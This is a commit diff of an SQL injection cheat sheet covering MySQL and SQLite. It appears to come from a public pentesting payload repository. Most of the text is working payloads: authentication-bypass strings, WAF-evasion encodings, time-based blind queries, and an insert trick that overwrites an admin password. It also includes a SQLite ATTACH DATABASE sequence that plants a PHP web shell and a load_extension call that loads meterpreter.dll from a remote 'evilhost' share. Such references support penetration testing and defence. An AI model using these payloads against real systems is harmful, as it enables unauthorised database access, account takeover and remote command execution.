["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"],
|
||||||
@ -169,12 +178,14 @@ tamper=name_of_the_tamper
|
|||||||
|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
|
|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
|
||||||
|
|
||||||
## Authentication bypass
|
## Authentication bypass
|
||||||
```
|
```sql
|
||||||
'-'
|
'-'
|
||||||
' '
|
' '
|
||||||
'&'
|
'&'
|
||||||
'^'
|
'^'
|
||||||
'*'
|
'*'
|
||||||
|
' or 1=1 limit 1 -- -+
|
||||||
|
'="or'
|
||||||
' or ''-'
|
' or ''-'
|
||||||
' or '' '
|
' or '' '
|
||||||
' or ''&'
|
' or ''&'
|
||||||
@ -258,26 +269,15 @@ admin") or "1"="1"/*
|
|||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
||||||
```
|
```
|
||||||
|
|
||||||
## Time based
|
|
||||||
```
|
|
||||||
SQLite : AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) comment: -- /**/
|
|
||||||
MySQL/MariaDB : AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1 comment: # -- /*!30100 MySQL code*/
|
|
||||||
MySQL/MariaDB : RLIKE SLEEP([SLEEPTIME]) comment: # -- /*!30100 MySQL code*/
|
|
||||||
MySQL/MariaDB : OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) comment: # -- /*!30100 MySQL code*/
|
|
||||||
Oracle : AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/
|
|
||||||
PostGreSQL : AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) comment: -- /**/
|
|
||||||
PostGreSQL : AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) comment: -- /**/
|
|
||||||
SQL Server : IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
|
|
||||||
```
|
|
||||||
|
|
||||||
## Polyglot injection (multicontext)
|
## Polyglot injection (multicontext)
|
||||||
```
|
```sql
|
||||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||||
```
|
```
|
||||||
|
|
||||||
## Insert Statement - ON DUPLICATE KEY UPDATE
|
## Insert Statement - ON DUPLICATE KEY UPDATE
|
||||||
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
|
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
|
||||||
```
|
```sql
|
||||||
Inject using payload:
|
Inject using payload:
|
||||||
attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" --
|
attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" --
|
||||||
|
|
||||||
@ -294,7 +294,7 @@ After this, we can simply authenticate with “admin@example.com” and the pass
|
|||||||
## WAF Bypass
|
## WAF Bypass
|
||||||
|
|
||||||
No Space (%20) - bypass using whitespace alternatives
|
No Space (%20) - bypass using whitespace alternatives
|
||||||
```
|
```sql
|
||||||
?id=1%09and%091=1%09--
|
?id=1%09and%091=1%09--
|
||||||
?id=1%0Dand%0D1=1%0D--
|
?id=1%0Dand%0D1=1%0D--
|
||||||
?id=1%0Cand%0C1=1%0C--
|
?id=1%0Cand%0C1=1%0C--
|
||||||
@ -304,31 +304,31 @@ No Space (%20) - bypass using whitespace alternatives
|
|||||||
```
|
```
|
||||||
|
|
||||||
No Whitespace - bypass using comments
|
No Whitespace - bypass using comments
|
||||||
```
|
```sql
|
||||||
?id=1/*comment*/and/**/1=1/**/--
|
?id=1/*comment*/and/**/1=1/**/--
|
||||||
```
|
```
|
||||||
|
|
||||||
No Whitespace - bypass using parenthesis
|
No Whitespace - bypass using parenthesis
|
||||||
```
|
```sql
|
||||||
?id=(1)and(1)=(1)--
|
?id=(1)and(1)=(1)--
|
||||||
```
|
```
|
||||||
|
|
||||||
No Comma - bypass using OFFSET, FROM and JOIN
|
No Comma - bypass using OFFSET, FROM and JOIN
|
||||||
```
|
```sql
|
||||||
LIMIT 0,1 -> LIMIT 1 OFFSET 0
|
LIMIT 0,1 -> LIMIT 1 OFFSET 0
|
||||||
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
|
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
|
||||||
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
|
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
|
||||||
```
|
```
|
||||||
|
|
||||||
Blacklist using keywords - bypass using uppercase/lowercase
|
Blacklist using keywords - bypass using uppercase/lowercase
|
||||||
```
|
```sql
|
||||||
?id=1 AND 1=1#
|
?id=1 AND 1=1#
|
||||||
?id=1 AnD 1=1#
|
?id=1 AnD 1=1#
|
||||||
?id=1 aNd 1=1#
|
?id=1 aNd 1=1#
|
||||||
```
|
```
|
||||||
|
|
||||||
Blacklist using keywords case insensitive - bypass using an equivalent operator
|
Blacklist using keywords case insensitive - bypass using an equivalent operator
|
||||||
```
|
```sql
|
||||||
AND -> &&
|
AND -> &&
|
||||||
OR -> ||
|
OR -> ||
|
||||||
= -> LIKE,REGEXP, not < and not >
|
= -> LIKE,REGEXP, not < and not >
|
||||||
@ -337,7 +337,7 @@ WHERE -> HAVING
|
|||||||
```
|
```
|
||||||
|
|
||||||
Information_schema.tables Alternative
|
Information_schema.tables Alternative
|
||||||
```
|
```sql
|
||||||
select * from mysql.innodb_table_stats;
|
select * from mysql.innodb_table_stats;
|
||||||
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
|
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
|
||||||
| database_name | table_name | last_update | n_rows | clustered_index_size | sum_of_other_index_sizes |
|
| database_name | table_name | last_update | n_rows | clustered_index_size | sum_of_other_index_sizes |
|
||||||
@ -358,7 +358,7 @@ mysql> show tables in dvwa;
|
|||||||
```
|
```
|
||||||
|
|
||||||
Version Alternative
|
Version Alternative
|
||||||
```
|
```sql
|
||||||
mysql> select @@innodb_version;
|
mysql> select @@innodb_version;
|
||||||
+------------------+
|
+------------------+
|
||||||
| @@innodb_version |
|
| @@innodb_version |
|
||||||
@ -400,6 +400,7 @@ mysql> mysql> select version();
|
|||||||
* POSTGRESQL:
|
* POSTGRESQL:
|
||||||
- [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
|
- [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
|
||||||
* Others
|
* Others
|
||||||
|
- [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
|
||||||
- [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
|
- [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
|
||||||
- [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
|
- [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
|
||||||
- [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
|
- [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
|
||||||
|
@ -1,50 +1,61 @@
|
|||||||
# SQLite Injection
|
# SQLite Injection
|
||||||
|
|
||||||
## SQLite version
|
## SQLite comment
|
||||||
|
```sql
|
||||||
|
--
|
||||||
|
/**/
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## SQLite version
|
||||||
|
```sql
|
||||||
select sqlite_version();
|
select sqlite_version();
|
||||||
```
|
```
|
||||||
|
|
||||||
## Integer/String based - Extract table name
|
## Integer/String based - Extract table name
|
||||||
```
|
```sql
|
||||||
SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
|
SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
|
||||||
```
|
```
|
||||||
Use limit X+1 offset X, to extract all tables.
|
Use limit X+1 offset X, to extract all tables.
|
||||||
|
|
||||||
## Integer/String based - Extract column name
|
## Integer/String based - Extract column name
|
||||||
```
|
```sql
|
||||||
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
|
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
|
||||||
```
|
```
|
||||||
|
|
||||||
For a clean output
|
For a clean output
|
||||||
```
|
```sql
|
||||||
SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
|
SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
|
||||||
```
|
```
|
||||||
|
|
||||||
## Boolean - Count number of tables
|
## Boolean - Count number of tables
|
||||||
```
|
```sql
|
||||||
and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
|
and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
|
||||||
```
|
```
|
||||||
|
|
||||||
## Boolean - Enumerating table name
|
## Boolean - Enumerating table name
|
||||||
```
|
```sql
|
||||||
and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
|
and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
|
||||||
```
|
```
|
||||||
|
|
||||||
## Boolean - Extract info
|
## Boolean - Extract info
|
||||||
```
|
```sql
|
||||||
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
|
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
|
||||||
```
|
```
|
||||||
|
|
||||||
## Remote Command Execution using SQLite command - Attach Database
|
## Time based
|
||||||
|
```sql
|
||||||
|
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Remote Command Execution using SQLite command - Attach Database
|
||||||
|
```sql
|
||||||
ATTACH DATABASE '/var/www/lol.php' AS lol;
|
ATTACH DATABASE '/var/www/lol.php' AS lol;
|
||||||
CREATE TABLE lol.pwn (dataz text);
|
CREATE TABLE lol.pwn (dataz text);
|
||||||
INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--
|
INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--
|
||||||
```
|
```
|
||||||
|
|
||||||
## Remote Command Execution using SQLite command - Load_extension
|
## Remote Command Execution using SQLite command - Load_extension
|
||||||
```
|
```sql
|
||||||
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
|
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
|
||||||
```
|
```
|
||||||
Note: By default this component is disabled
|
Note: By default this component is disabled
|
||||||
|
Loading…
Reference in New Issue
Block a user